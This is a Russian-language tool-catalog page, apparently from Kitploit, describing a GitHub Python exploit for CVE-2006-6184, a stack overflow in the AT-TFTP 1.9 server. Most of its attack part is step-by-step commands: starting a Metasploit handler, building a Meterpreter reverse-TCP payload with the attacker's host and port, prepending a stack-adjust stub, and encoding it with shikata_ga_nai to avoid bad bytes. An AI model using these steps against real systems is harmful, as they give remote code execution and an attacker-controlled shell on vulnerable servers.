Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/b03902043/cve-2006-6184
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubb03902043/cve-2006-6184

CVE-2006-6184

упрощённая версия https://github.com/shauntdergrigorian/cve-2006-6184

Репозиторий
17 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2006-6184

Это автономный эксплойт на Python для CVE-2006-6184. Данный эксплойт вызывает переполнение буфера в стеке в TFTP-сервере Allied Telesyn (AT-TFTP) версии 1.9 и, возможно, более ранних, что позволяет удаленным злоумышленникам вызвать отказ в обслуживании или выполнить произвольный код.

Быстрый старт

  1. запустите exploit/multi/handler на прослушивание
  2. python generate.py LHOST LPORT PAYLOAD RHOST RPORT (пример PAYLOAD: windows/meterpreter/reverse_nonx_tcp)
  3. удачного кодирования (возможно, сначала стоит мигрировать процесс(?))

ВНИМАНИЕ, СКИДДИ!

Вы ведь не думали, что это будет так просто, не так ли? Полезная нагрузка (payload) должна быть настроена с вашим IP-адресом и портом прослушивания, поэтому вам нужно сгенерировать её самостоятельно. Для этого выполните следующие шаги:

1.) Введите следующую команду, чтобы создать hex-файл с величиной, которую нужно вычесть из указателя стека (3500):

root@kitploit:~
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj

2.) Затем используйте следующую команду для создания ступенчатой полезной нагрузки meterpreter shell:

root@kitploit:~
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload

3.) Затем объедините два созданных файла.

root@kitploit:~
cat stackadj payload > shellcode

4.) Наконец, избавимся от плохих символов.

root@kitploit:~
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python

Введите результат в качестве значения переменной "payload".

Скачать инструмент